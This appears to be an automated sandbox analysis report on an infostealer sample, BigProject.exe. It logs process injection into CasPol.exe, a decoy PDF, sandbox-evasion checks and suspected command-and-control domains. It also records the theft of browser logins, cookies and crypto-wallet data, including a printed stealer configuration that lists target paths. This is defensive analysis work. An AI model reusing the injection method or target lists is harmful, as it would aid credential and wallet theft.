Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: BigProject.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: BigProject.exe Static file information: File size 1600512 > 1048576
Source: BigProject.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x16a800
Source: BigProject.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: BigProject.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B4508F push esp; iretd 0_2_00B45090
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B460F2 pushad ; ret 0_2_00B460F3
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B450C3 pushad ; ret 0_2_00B450DF
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B44833 pushad ; ret 0_2_00B44834
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00CA5860 push eax; ret 0_2_00CA587E
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B45847 pushad ; ret 0_2_00B45848
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B45980 pushad ; ret 0_2_00B4598A
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B46982 pushad ; ret 0_2_00B4699E
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B45909 push ebp; retf 0015h 0_2_00B4590A
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B452BA push ebp; retf 0_2_00B452BB
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B46234 pushad ; ret 0_2_00B46235
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B47248 pushad ; ret 0_2_00B47249
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B47364 pushad ; ret 0_2_00B4738B
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B45DB2 push esi; retn 0015h 0_2_00B45DB3
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B4359B pushad ; ret 0_2_00B4359C
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B446F1 pushad ; ret 0_2_00B446F2
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B43E46 pushad ; ret 0_2_00B43E47
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B44F9C pushad ; ret 0_2_00B44F9D
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00B43F7F pushad ; ret 0_2_00B43F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh 7_2_0043D812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_00443469 push ebp; iretd 7_2_0044346C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0044366E push 9F00CD97h; ret 7_2_004436B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h 7_2_0043AE3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0044171E push esp; ret 7_2_0044171F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_004477A5 push ebp; iretd 7_2_004477AA
Source: C:\Users\user\Desktop\BigProject.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\BigProject.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7472 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00C17458 GetSystemInfo, 0_2_00C17458
Source: CasPol.exe, 00000007.00000002.2450746382.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWhf
Source: CasPol.exe, 00000007.00000002.2450746382.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWJ?Q
Source: BigProject.exe, 00000000.00000002.2453321140.000000000113E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH~
Source: BigProject.exe, 00000000.00000002.2453321140.00000000011A0000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000002.2450746382.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 7_2_0043C1F0 LdrInitializeThunk, 7_2_0043C1F0
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00CA53A4 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00CA53A4
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00CA53A4 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00CA53A4
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00CA55FE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00CA55FE

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\BigProject.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: rapeflowwj.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: crosshuaht.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: sustainskelet.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: aspecteirs.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: energyaffai.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: necklacebudi.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: discokeyus.lat
Source: BigProject.exe, 00000000.00000003.2452421280.0000000003A21000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: grannyejh.lat
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 440000
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 443000
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 452000
Source: C:\Users\user\Desktop\BigProject.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 861008
Source: C:\Users\user\Desktop\BigProject.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\NavanItinerary.pdf"
Source: C:\Users\user\Desktop\BigProject.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\BigProject.exe Code function: 0_2_00CA5294 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00CA5294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Blob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 7404, type: MEMORYSTR
Source: CasPol.exe, 00000007.00000002.2450915117.0000000000D93000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: top\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Authy Desktop","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"z":"Wallets/Guarda","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\DashCore\\wallets","m":["*.dat"],"z":"Wallets/DashCore","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\WalletWasabi\\Client\\Wallets","m":["*"],"z":"Wallets/Wasabi","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Daedalus Mainnet\\wallets","m":["she.*.sqlite"],"z":"Wallets/Daedalus","d":0,"fs":20971520},{"t":1,"p":"%localappdata%\\Google\\Chrome\\User Data","z":"Chrome","f":"Google Chrome","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%localappdata%\\Google\\Chrome Beta\\User Data","z":"Chrome Beta","f":"Google Chrome Beta","n":"chrome.exe","l":"chrome.dll"},{"t":1,"p":"%appdata%\\Opera Software\\Opera Stable","z":"Opera","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Opera Software\\Opera Neon\\User Data","z":"Opera Neon"},{"t":1,"p":"%appdata%\\Opera Software\\Opera GX Stable","z":"Opera GX Stable","n":"opera.exe"},{"t":1,"p":"%localappdata%\\Microsoft\\Edge\\User Data","z":"Edge","f":"Microsoft 
Edge","n":"msedge.exe","l":"msedge.dll"},{"t":1,"p":"%localappdata%\\BraveSoftware\\Brave-Browser\\User Data","z":"Brave","f":"BraveSoftware Brave-Browser","n":"brave.exe","l":"chrome.dll"},{"t":1,"p":"%local
Source: CasPol.exe, 00000007.00000002.2450746382.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
